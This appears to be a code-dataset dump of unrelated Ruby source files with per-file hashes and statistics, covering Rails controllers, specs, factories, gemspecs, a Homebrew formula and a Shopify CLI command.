1880f84ecff209c61d00fe95e31b4b751d5f27b2 | 1,789 | require 'spec_helper'
describe 'odoo::repo9' do
let(:pre_condition) do
[
'class apt() {}',
'define apt::key($ensure, $id, $source) {}',
'define apt::source($ensure, $location, $comment, $release, $repos, $include) {}',
'class apt::update() {}'
]
end
let!(:stdlib_stubs) do
MockFunction.new('create_ini_settings', type: :statement) do |_f|
end
end
context 'with defaults for all parameters (Debian)' do
let :facts do
{
osfamily: 'Debian'
}
end
it do
should contain_class('odoo::repo9').only_with(
ensure: 'present',
descr: 'Odoo Nightly repository',
key_id: '5D134C924CB06330DCEFE2A1DEF2A2198183CBB5',
key_url: 'https://nightly.odoo.com/odoo.key',
pkg_url: nil,
release: './',
repos: ''
)
should contain_apt__key('odookey').with(
ensure: 'present',
id: '5D134C924CB06330DCEFE2A1DEF2A2198183CBB5',
source: 'https://nightly.odoo.com/odoo.key'
)
should contain_apt__source('odoo').with(
ensure: 'present',
location: 'http://nightly.odoo.com/9.0/nightly/deb/',
comment: 'Odoo Nightly repository',
release: './',
include: { 'src' => false }
)
should contain_exec('update-odoo-repos').with(
refreshonly: true,
command: '/bin/true'
)
end
end
context 'with defaults for all parameters (RedHat)' do
let :facts do
{
osfamily: 'RedHat'
}
end
it do
should contain_yumrepo('odoo').with(
ensure: 'present',
descr: 'Odoo Nightly repository',
baseurl: 'http://nightly.odoo.com/9.0/nightly/rpm/',
enabled: 1,
gpgcheck: 0
)
end
end
end
| 24.175676 | 88 | 0.568474 |
26c064faf3b69c67177df328180556bb533067d5 | 511 | class FakeStarReadingResultGenerator
def initialize(student, options = {}, index)
@student = student
@index = index
@start_date = options.fetch(:start_date)
@days_between_tests = options.fetch(:days_between_tests)
end
def next
return {
date_taken: @start_date + (@index * @days_between_tests),
percentile_rank: rand(10..99),
grade_equivalent: ["0.00", "4.00", "5.70", "2.60"].sample,
student_id: @student.id,
total_time: rand(1000..1800)
}
end
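  # Each call to #next builds one fake STAR Reading result hash. The taken date
  # is offset from `start_date` by `index * days_between_tests`, so generators
  # created with successive indexes yield evenly spaced test dates.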
end
| 26.894737 | 64 | 0.65362 |
214381b0b45490462eed1ebe1326197b3325fe4d | 296 | module AppleNews
module Component
module ScalableImage
extend ActiveSupport::Concern
included do
required_property :url
optional_properties :accessibility_caption, :caption, :explicit_content
property_inflection :url, 'URL'
end
end
end
end
| 19.733333 | 79 | 0.692568 |
87865b7aa1d5b37ac0d3b6fee05d5a120e3d6388 | 237 | # frozen_string_literal: true
FactoryBot.define do
factory :review do
association :account
association :project
title { Faker::Lorem.characters(number: 16) }
comment { Faker::Lorem.characters(number: 1024) }
end
end
| 21.545455 | 53 | 0.7173 |
33c2290759041c90a751a0670cc54795ab58248e | 170 | class Process
class << self
def on(event, &callback)
`process.on(#{event}, #{callback})`
end
def platform
`process.platform`
end
end
end
| 14.166667 | 41 | 0.582353 |
d50ffc79af7d680241f755472e6ce1f3509bc501 | 257 | # frozen_string_literal: true
module Lokalise
module Collections
class Translation < Base
class << self
def endpoint(project_id, *_args)
path_from projects: [project_id, 'translations']
end
end
end
end
end
| 18.357143 | 58 | 0.642023 |
4a54ae6ad55f035e10b16a14971fbbdd3e61ea1d | 1,437 | class <%= controller_name %> < Application
# provides :xml, :yaml, :js
def index
@<%= plural_name %> = <%= class_name %>.all
display @<%= plural_name %>
end
def show(id)
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
display @<%= name %>
end
def new
only_provides :html
@<%= name %> = <%= class_name %>.new
display @<%= name %>, :form
end
def edit(id)
only_provides :html
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
display @<%= name %>, :form
end
def create(<%= name %>)
@<%= name %> = <%= class_name %>.new(<%= name %>)
if @<%= name %>.save
redirect resource(@<%= name %>), :message => {:notice => "<%= class_name %> was successfully created"}
else
message[:error] = "<%= class_name %> failed to be created"
display @<%= name %>, :form
end
end
def update(id, <%= name %>)
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
if @<%= name %>.update_attributes(<%= name %>)
redirect resource(@<%= name %>)
else
display @<%= name %>, :form
end
end
def destroy(id)
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
if @<%= name %>.destroy
redirect resource(:<%= plural_name %>)
else
raise InternalServerError
end
end
end # <%= controller_name %>
| 24.775862 | 108 | 0.527488 |
f71287cec07ecb10437298afdfc40cd9ee5ed180 | 343 | module Amistad
module FriendshipModel
def self.included(receiver)
if receiver.ancestors.map(&:to_s).include?("ActiveRecord::Base")
receiver.class_exec do
include Amistad::ActiveRecordFriendshipModel
end
else
raise "Amistad only supports ActiveRecord and Mongoid"
end
end
end
end
| 24.5 | 70 | 0.676385 |
b9a6a312107b7f3b7da006c0869bc6058aa1c433 | 849 | class Web < Sinatra::Base
get '/' do
erb :web
end
get '/redirect' do
return if Bot&.instance && Bot.instance.client_started?
begin
log = Log.create
log.getting_token
web_client = Slack::Web::Client.new
rc = web_client.oauth_access(
client_id: configatron.slack.client_id,
client_secret: configatron.slack.client_secret,
code: params[:code]
)
token = rc['bot']['bot_access_token']
storage = Storage.instance
storage.token = token
Slack.configure do |config|
config.token = storage.token
end
client = Slack::RealTime::Client.new
Bot.create(client, storage, log)
log.success
rescue StandardError => e
log = Log.create
log.something_went_wrong(e)
end
end
end
| 22.342105 | 60 | 0.594817 |
e99ae11a53c27559a3ce61db467ad9a1ce47186c | 646 | module Nmax
  ## Storage class for storing sorted numbers
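  # Usage sketch (hypothetical values): only the `size` largest distinct numbers
  # are kept, iterated in ascending order.
  #   storage = Nmax::Storage.new(size: 3)
  #   [5, 1, 9, 7].each { |n| storage.add(n) }
  #   storage.each { |n| print n, " " } # => 5 7 9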
class Storage
def initialize(size:)
@sorted_storage = SortedSet.new
@size = size
end
def add(number)
return if @sorted_storage.include?(number)
if @sorted_storage.size < @size
@sorted_storage.add(number)
else
custom_add(number)
end
end
def each(&block)
@sorted_storage.each(&block)
end
private
def custom_add(number)
min_number = @sorted_storage.min
return unless min_number < number
@sorted_storage.delete(min_number)
@sorted_storage.add(number)
end
end
end
| 18.457143 | 48 | 0.637771 |
914ab7e42270b9d177073064e183eb458bb6fd4e | 1,315 | {
matrix_id: '1776',
name: 'stat96v5',
group: 'Meszaros',
description: 'linear programming problem, C. Meszaros test set',
author: '',
editor: 'C. Meszaros',
date: '2005',
kind: 'linear programming problem',
problem_2D_or_3D: '0',
num_rows: '2307',
num_cols: '75779',
nonzeros: '233921',
num_explicit_zeros: '0',
num_strongly_connected_components: '3',
num_dmperm_blocks: '3',
structural_full_rank: 'false',
structural_rank: '2305',
pattern_symmetry: '0.000',
numeric_symmetry: '0.000',
rb_type: 'real',
structure: 'rectangular',
cholesky_candidate: 'no',
positive_definite: 'no',
notes: 'http://www.sztaki.hu/~meszaros/public_ftp/lptestset
Converted to standard form via Resende and Veiga\'s mpsrd:
minimize c\'*x, subject to A*x=b and lo <= x <= hi
',
b_field: 'full 2307-by-1
',
aux_fields: 'c: full 75779-by-1
lo: full 75779-by-1
hi: full 75779-by-1
z0: full 1-by-1
', norm: '1.952339e+01',
min_singular_value: '0',
condition_number: 'Inf',
svd_rank: '2305',
sprank_minus_rank: '0',
null_space_dimension: '2',
full_numerical_rank: 'no',
svd_gap: 'Inf',
image_files: 'stat96v5.png,stat96v5_dmperm.png,stat96v5_scc.png,stat96v5_svd.png,stat96v5_graph.gif,',
}
| 29.222222 | 106 | 0.647148 |
d5aea3201f97fa6f762b225653f8be53d2694fba | 146 | # Be sure to restart your server when you modify this file.
Rails.application.config.session_store :cookie_store, key: '_nineties_slang_session'
| 36.5 | 84 | 0.815068 |
5d4fc59fb95afecaa69e47bcefa7cda7fd1c96b7 | 1,071 | # frozen_string_literal: true
require 'spec_helper'
require 'rubocop'
require 'rubocop/rspec/support'
require_relative '../../../../rubocop/cop/migration/add_column_with_default'
describe RuboCop::Cop::Migration::AddColumnWithDefault do
include CopHelper
let(:cop) { described_class.new }
context 'outside of a migration' do
it 'does not register any offenses' do
expect_no_offenses(<<~RUBY)
def up
add_column_with_default(:merge_request_diff_files, :artifacts, :boolean, default: true, allow_null: false)
end
RUBY
end
end
context 'in a migration' do
before do
allow(cop).to receive(:in_migration?).and_return(true)
end
let(:offense) { '`add_column_with_default` is deprecated, use `add_column` instead' }
it 'registers an offense ' do
expect_offense(<<~RUBY)
def up
add_column_with_default(:merge_request_diff_files, :artifacts, :boolean, default: true, allow_null: false)
^^^^^^^^^^^^^^^^^^^^^^^ #{offense}
end
RUBY
end
end
end
| 25.5 | 116 | 0.666667 |
e9e86c0d22b6803fb6c0fbbf830d05d4662a0a88 | 326 | class CreateRefunds < ActiveRecord::Migration
def change
create_table :refunds do |t|
t.integer :provider_id
t.integer :claimant_id
t.float :amount_requested
t.date :date_received
t.float :amount_received
t.date :date_posted
t.text :reason
t.timestamps
end
end
end
| 20.375 | 45 | 0.662577 |
9131dac5c84073e0f5f704b2a47f00c6410f44b0 | 652 | Rails.application.configure do
config.lograge.enabled = true
config.lograge.custom_options = lambda do |event|
{
pid: Process.pid,
ip: event.payload[:ip],
user: event.payload[:user],
time: event.time.utc.strftime("%Y-%m-%dT%H:%M:%SZ"),
params: event.payload[:params].except(*%w(controller action format id))
}
end
config.lograge.formatter = ->(data) {
"#{data[:time]} pid=#{data[:pid]} method=#{data[:method]} path=#{data[:path]} controller=#{data[:controller]}##{data[:action]} params=#{data[:params]} status=#{data[:status]} duration=#{data[:duration]}ms ip=#{data[:ip]} user=#{data[:user]}"
}
end
| 40.75 | 245 | 0.633436 |
ab19b15563a9188d8383a217197f4e556f31d940 | 677 | # Behaviors
class Behavior < ApplicationRecord
belongs_to :client
has_many :behavior_reports
validates :description, presence: true
attr_encryptor :description,
key: Rails.application.secrets.behavior_description_key,
algorithm: 'aes-256-cbc',
mode: :single_iv_and_salt,
insecure_mode: true
def report_count
behavior_reports.size
end
def occurrence_count
behavior_reports.collect(&:occurrences).sum
end
def timestamp
created_at.to_formatted_s(:long)
end
def updated_timestamp
updated_at.to_formatted_s(:long)
end
scope :active, -> { where(removed: false) }
end
| 21.83871 | 73 | 0.686854 |
397eaee068c2d495dc6246ed7fd3d78ac977a6ab | 4,777 | require 'spec_helper'
# Snippet visibility scenarios are covered in more detail in spec/support/snippet_visibility.rb
describe PersonalSnippetPolicy do
let(:regular_user) { create(:user) }
let(:external_user) { create(:user, :external) }
let(:admin_user) { create(:user, :admin) }
let(:author_permissions) do
[
:update_personal_snippet,
:admin_personal_snippet,
:destroy_personal_snippet
]
end
def permissions(user)
described_class.new(user, snippet)
end
context 'public snippet' do
let(:snippet) { create(:personal_snippet, :public) }
context 'no user' do
subject { permissions(nil) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'regular user' do
subject { permissions(regular_user) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'author' do
subject { permissions(snippet.author) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_allowed(*author_permissions)
end
end
end
context 'internal snippet' do
let(:snippet) { create(:personal_snippet, :internal) }
context 'no user' do
subject { permissions(nil) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'regular user' do
subject { permissions(regular_user) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'external user' do
subject { permissions(external_user) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'snippet author' do
subject { permissions(snippet.author) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_allowed(*author_permissions)
end
end
end
context 'private snippet' do
let(:snippet) { create(:project_snippet, :private) }
context 'no user' do
subject { permissions(nil) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'regular user' do
subject { permissions(regular_user) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'admin user' do
subject { permissions(admin_user) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'external user' do
subject { permissions(external_user) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'snippet author' do
subject { permissions(snippet.author) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_allowed(*author_permissions)
end
end
end
end
| 28.951515 | 97 | 0.694369 |
62f8add0264cc41a6e817da9a3224f4db6cf4c36 | 906 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "an included module" do
module A
def foo
"foo"
end
end
module B; include A; end
module C; include B; end
module D; include B; end
it "should still be included after reincarnation" do
A.reincarnate
module A
def foo
super*2
end
end
class ATestB; include B; end
ATestB.new.foo.should == "foofoo"
class ATestC; include C; end
ATestC.new.foo.should == "foofoo"
class ATestD; include D; end
ATestD.new.foo.should == "foofoo"
A.reincarnate
module A
def foo
super + bar
end
end
module B; def bar; "B"; end; end
module C; def bar; "C"; end; end
module D; def bar; "D"; end; end
ATestB.new.foo.should == "foofooB"
ATestC.new.foo.should == "foofooC"
ATestD.new.foo.should == "foofooD"
end
end
| 19.276596 | 65 | 0.609272 |
ac5d55d2ab719c83193e3142fbb54d3e78c3707f | 3,188 | # frozen_string_literal: true
class Fisk
module Instructions
# Instruction VBROADCASTSD
forms = []
operands = []
encodings = []
# vbroadcastsd: ymm{k}{z}, xmm
operands << OPERAND_TYPES[59]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: zmm{k}{z}, xmm
operands << OPERAND_TYPES[62]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: ymm{k}{z}, m64
operands << OPERAND_TYPES[59]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: zmm{k}{z}, m64
operands << OPERAND_TYPES[62]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: ymm, xmm
operands << OPERAND_TYPES[65]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_VEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: ymm, m64
operands << OPERAND_TYPES[65]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_VEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
VBROADCASTSD = Instruction.new("VBROADCASTSD", forms)
end
end
| 27.016949 | 57 | 0.576851 |
f8bf4124443145cf885ddb5900d98cdad320acce | 240 | module GymcloudAPI::V2
module Entities
class UserAuthentication < Grape::Entity
expose :id
expose :email
expose :provider do |auth|
auth.authentication_provider.name
end
expose :created_at
expose :updated_at
end
end
end
| 13.333333 | 40 | 0.754167 |
4a5a668cff394beafb5fe9c301be421001447160 | 908 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
test "should get home" do
    get root_path
assert_response :success
assert_select "title", "Ruby on Rails Tutorial Sample App"
end
test "should get help" do
get help_path
assert_response :success
assert_select "title", "Help | Ruby on Rails Tutorial Sample App"
end
test "should get about" do
get about_path
assert_response :success
assert_select "title", "About | Ruby on Rails Tutorial Sample App"
end
test "should get contact" do
get contact_path
assert_response :success
assert_select "title", "Contact | Ruby on Rails Tutorial Sample App"
end
test "should get signup" do
get signup_path
assert_response :success
assert_select "title", "Signup | Ruby on Rails Tutorial Sample App"
end
end
| 26.705882 | 72 | 0.711454 |
ff78f8b12059bd2ccddae61dc95e565309dc9df8 | 2,720 | description "Toolkit Kickstart"
# Stylesheets
file '../shared/style.scss', :like => :stylesheet, :media => 'screen, projection', :to => 'style.scss'
file '_base.scss', :like => :stylesheet, :to => 'partials/global/_base.scss'
file '../shared/_variables.scss', :like => :stylesheet, :to => 'partials/global/_variables.scss'
file '../shared/_functions.scss', :like => :stylesheet, :to => 'partials/global/_functions.scss'
file '../shared/_mixins.scss', :like => :stylesheet, :to => 'partials/global/_mixins.scss'
file '../shared/_extendables.scss', :like => :stylesheet, :to => 'partials/global/_extendables.scss'
file '../shared/_style-guide.scss', :like => :stylesheet, :to => 'partials/styleguide/_style-guide.scss'
file '../shared/_layout.scss', :like => :stylesheet, :to => 'partials/layout/_layout.scss'
file '../shared/_ie-layout.scss', :like => :stylesheet, :to => 'partials/layout/_ie-layout.scss'
file '../shared/_print-layout.scss', :like => :stylesheet, :to => 'partials/layout/_print-layout.scss'
file '../shared/_design.scss', :like => :stylesheet, :to => 'partials/design/_design.scss'
file '../shared/_ie-design.scss', :like => :stylesheet, :to => 'partials/design/_ie-design.scss'
file '../shared/_print-design.scss', :like => :stylesheet, :to => 'partials/design/_print-design.scss'
file '../shared/print.scss', :like => :stylesheet, :media => 'print', :to => 'print.scss'
file '../shared/ie.scss', :like => :stylesheet, :media => 'screen, projection', :condition => "lte IE 8", :to => 'ie.scss'
help %Q{
Please contact Sam Richard or Mason Wendell with questions:
[email protected]
[email protected]
}
welcome_message %Q{
Toolkit Kickstart
Welcome to Toolkit! Provided are the basic tools needed to kickstart a new Sass project tailor made to your needs! Remember, tools and best practices are always changing, so keep up to date!
The following is included in this build:
Compass Extensions:
* Toolkit
Include the following in your <head> tag:
<meta content='width=device-width, initial-scale=1.0' name='viewport' />
<meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible' />
<!--[if lt IE 9 ]> <script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1.0.2/CFInstall.min.js"></script><script>window.attachEvent("onload",function(){CFInstall.check({mode:"overlay"})})</script> <![endif]-->
<!-- CSS -->
<link href='path/to/css/style.css?v=1' rel='stylesheet' />
<!-- All JavaScript at the bottom, except for Modernizr. -->
Include the following, and all other JavaScript, including any JavaScript frameworks you may be using like jQuery, right before your closing </body> tag:
<!-- Javascript at the bottom for fast page loading -->
}
| 46.896552 | 216 | 0.689338 |
5d1e6d0028ef43df63ef3b2b096eec6755f26f31 | 183 | # frozen_string_literal: true
class CreateJmxes < ActiveRecord::Migration[5.2]
def change
create_table :jmxes do |t|
t.string :name
t.timestamps
end
end
end
| 15.25 | 48 | 0.677596 |
3881179f74f3f6bbe78933137b5f7a18ac018270 | 1,181 | # encoding: utf-8
$:.push File.expand_path("../lib", __FILE__)
require "audited/version"
Gem::Specification.new do |gem|
gem.name = 'audited'
gem.version = Audited::VERSION
gem.authors = ['Brandon Keepers', 'Kenneth Kalmer', 'Daniel Morrison', 'Brian Ryckbost', 'Steve Richert', 'Ryan Glover']
gem.email = '[email protected]'
gem.description = 'Log all changes to your models'
gem.summary = gem.description
gem.homepage = 'https://github.com/collectiveidea/audited'
gem.license = 'MIT'
gem.add_dependency 'rails-observers', '~> 0.1.2'
gem.add_development_dependency "protected_attributes"
gem.add_development_dependency 'appraisal', '~> 1.0.0'
gem.add_development_dependency 'bson_ext', '~> 1.6'
gem.add_development_dependency 'mongo_mapper', '~> 0.13.0.beta2'
gem.add_development_dependency 'rails', '~> 4.0.0'
gem.add_development_dependency 'rspec-rails', '~> 3.0'
gem.add_development_dependency 'sqlite3', '~> 1.0'
gem.files = `git ls-files`.split($\).reject{|f| f =~ /(\.gemspec|lib\/audited\-|adapters|generators)/ }
gem.test_files = gem.files.grep(/^spec\//)
gem.require_paths = ['lib']
end
| 39.366667 | 126 | 0.684166 |
62152c327ab240aacc893942099611d6a86d3511 | 554 | # frozen_string_literal: true
FactoryBot.define do
factory :naive_mooc_provider_user, class: 'MoocProviderUser' do
association :user_id, factory: :user
association :mooc_provider_id, factory: :mooc_provider
sequence(:access_token) {|n| "token#{n}" }
end
factory :oauth_mooc_provider_user, class: 'MoocProviderUser' do
association :user_id, factory: :user
association :mooc_provider_id, factory: :mooc_provider
sequence(:access_token) {|n| "token#{n}" }
access_token_valid_until { Time.zone.now + 5.minutes }
end
end
| 32.588235 | 65 | 0.738267 |
6aad2d1c0cb7ec09b365d6de0e5c2f70cf79b684 | 508 | require 'net/http'
require 'uri'
module Api::V1::UserHelper
TOKEN = ''
def transaction_result?(amount:, destination:)
url = 'http://api.goldbank.ru/transfer'
query = {
amount: amount,
currency: 'USD',
destination: destination,
token: TOKEN
}
    # The block form of RestClient.post yields the raw response instead of
    # raising on non-2xx status codes, so the result is mapped to true/false here.
    RestClient.post(url, query) do |response, _request, _result|
      case response.code
      when 200
        true
      else
        false
      end
    end
end
end
| 18.142857 | 68 | 0.535433 |
21f8c2708024df6dffecb77844cfc6f75526679b | 677 | class SessionsController < ApplicationController
def new
end
def create
user = User.find_by(email: params[:session][:email].downcase)
if user && user.authenticate(params[:session][:password])
if user.activated?
log_in user
params[:session][:remember_me] == '1' ? remember(user) : forget(user)
redirect_back_or user
else
flash[:danger] = 'Account not activated, Check your email for the activation link.'
redirect_to root_url
end
else
flash.now[:danger] = 'Email or password is wrong!'
render 'new'
end
end
def destroy
log_out if log_in?
redirect_to root_path
end
end
| 23.344828 | 91 | 0.648449 |
5d9a45b9a77c0a8482faa3eab3f4f52e4271310d | 843 | # frozen_string_literal: true
module SolidusShipstation
module Api
class ThresholdVerifier
class << self
def call(shipment)
return false unless shipment.order.completed?
!!(shipment_requires_creation?(shipment) || shipment_requires_update?(shipment))
end
private
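        # A shipment needs creating in ShipStation when it has never been synced
        # and the order changed within the configured sync threshold; it needs
        # updating when it was last synced before the order's latest change,
        # again only inside that threshold window.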
def shipment_requires_creation?(shipment)
shipment.shipstation_synced_at.nil? &&
Time.zone.now - shipment.order.updated_at < SolidusShipstation.config.api_sync_threshold
end
def shipment_requires_update?(shipment)
shipment.shipstation_synced_at &&
shipment.shipstation_synced_at < shipment.order.updated_at &&
Time.zone.now - shipment.order.updated_at < SolidusShipstation.config.api_sync_threshold
end
end
end
end
end
| 29.068966 | 100 | 0.680902 |
5dbb6004209eba0688892000165e4220d13d5c03 | 283 | def intersection(nums1, nums2)
lookup_table = Array.new(1001, nil)
nums1.each { |num| lookup_table[num] = true }
intersection = []
nums2.each do |num|
if lookup_table[num] == true
intersection << num
lookup_table[num] = false
end
end
intersection
end
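# Usage sketch (assumes values fit the 0..1000 range covered by the lookup table):
#   intersection([1, 2, 2, 1], [2, 2]) #=> [2]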
| 21.769231 | 47 | 0.657244 |
e810529af1822082131b080e579f7760c4339717 | 2,171 | class Libphonenumber < Formula
desc "C++ Phone Number library by Google"
homepage "https://github.com/google/libphonenumber"
url "https://github.com/google/libphonenumber/archive/v8.12.20.tar.gz"
sha256 "a318a40272587305c2e2d6f0663c06f6d7bdb0d0be0877bfd67518a3cdfffe33"
license "Apache-2.0"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any, arm64_big_sur: "833d131c18e4075266e9a7d036aed634ee6afed3b60adfcdab544a2603ce5c72"
sha256 cellar: :any, big_sur: "3da794404f364641ced3615e97acfda547a86c112dd4d3569fd5453522473ab7"
sha256 cellar: :any, catalina: "ddc9ddb6c2178af9c4772e2563c728696b2ac59e36f02fe55d8b52964c6e9f00"
sha256 cellar: :any, mojave: "d9503ced2ea7c11cdea1e6c150aa0be98ef57164a5e5893bb90aba0b79e3e930"
sha256 cellar: :any_skip_relocation, x86_64_linux: "aecbd5a168b921a093277129733d409839858c93623de1ae86a2d88e74ecea53"
end
depends_on "cmake" => :build
depends_on "googletest" => :build
depends_on "boost"
depends_on "icu4c"
depends_on "protobuf"
depends_on "re2"
def install
ENV.cxx11
system "cmake", "cpp", "-DGTEST_INCLUDE_DIR=#{Formula["googletest"].include}",
*std_cmake_args
system "make", "install"
end
test do
(testpath/"test.cpp").write <<~EOS
#include <phonenumbers/phonenumberutil.h>
#include <phonenumbers/phonenumber.pb.h>
#include <iostream>
#include <string>
using namespace i18n::phonenumbers;
int main() {
PhoneNumberUtil *phone_util_ = PhoneNumberUtil::GetInstance();
PhoneNumber test_number;
string formatted_number;
test_number.set_country_code(1);
test_number.set_national_number(6502530000ULL);
phone_util_->Format(test_number, PhoneNumberUtil::E164, &formatted_number);
if (formatted_number == "+16502530000") {
return 0;
} else {
return 1;
}
}
EOS
system ENV.cxx, "-std=c++11", "test.cpp", "-L#{lib}", "-lphonenumber", "-o", "test"
system "./test"
end
end
| 35.016129 | 122 | 0.676647 |
918262a1fd6bd7cb3497d8208dea281efcffc45b | 2,018 | ###############################################################################
# Copyright 2012-2013 inBloom, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
class User < ActiveRecord::Base
attr_accessible :email, :name, :provider, :uid
has_many :tags
def self.create_with_omniauth(request, auth)
session_info = self.check_session(request, auth)
create! do |user|
user.provider = auth["provider"]
user.full_name = session_info["full_name"]
user.realm = session_info["realm"]
user.tenant_id = session_info["tenantId"]
user.user_id = session_info["user_id"]
user.external_id = session_info["external_id"]
user.email = session_info["email"]
end
end
def self.get_authed_user(request, auth)
session_info = self.check_session(request, auth)
User.find_by_provider_and_user_id(auth["provider"], session_info["user_id"]) || User.create_with_omniauth(request, auth)
end
private
def self.check_session(request, auth)
path = 'https://api.sandbox.inbloom.org/api/rest/system/session/check'
headers = { "Accept" => 'application/vnd.slc+json',
"Content-Type" => 'application/vnd.slc+json',
"Authorization" => "bearer #{auth[:credentials][:token]}" }
slc_response = HTTParty.send(request.method.underscore.to_sym, path, :headers => headers)
return JSON.parse(slc_response)
end
end | 38.075472 | 124 | 0.650644 |
9193d2ee3dd6b83db94e3c485c2668642e2671c7 | 1,860 | require 'shopify_cli'
module ShopifyCli
module Commands
class Connect < ShopifyCli::Command
class << self
def call(args, command_name)
ProjectType.load_type(args[0]) unless args.empty?
super
end
def help
ShopifyCli::Context.message('core.connect.help', ShopifyCli::TOOL_NAME)
end
end
def call(args, command_name)
if Project.current&.env
@ctx.puts(@ctx.message('core.connect.already_connected_warning'))
end
project_type = ask_project_type
klass = ProjectType.load_type(project_type)&.connect_command
if klass
klass.ctx = @ctx
klass.call(args, command_name, 'connect')
else
app = default_connect(project_type)
@ctx.done(@ctx.message('core.connect.connected', app))
end
end
def ask_project_type
CLI::UI::Prompt.ask(@ctx.message('core.connect.project_type_select')) do |handler|
ShopifyCli::Commands::Create.all_visible_type.each do |type|
handler.option(type.project_name) { type.project_type }
end
end
end
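      # Ensures an organization/environment exists, writes .shopify-cli.yml when
      # the project is not yet connected, then returns the title of the app whose
      # API key matches the stored env.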
def default_connect(project_type)
org = ShopifyCli::Tasks::EnsureEnv.call(@ctx, regenerate: true)
write_cli_yml(project_type, org['id']) unless Project.has_current?
api_key = Project.current(force_reload: true).env['api_key']
get_app(org['apps'], api_key).first['title']
end
def write_cli_yml(project_type, org_id)
ShopifyCli::Project.write(
@ctx,
project_type: project_type,
organization_id: org_id,
)
@ctx.done(@ctx.message('core.connect.cli_yml_saved'))
end
def get_app(apps, api_key)
apps.select { |app| app["apiKey"] == api_key }
end
end
end
end
| 28.615385 | 90 | 0.615591 |
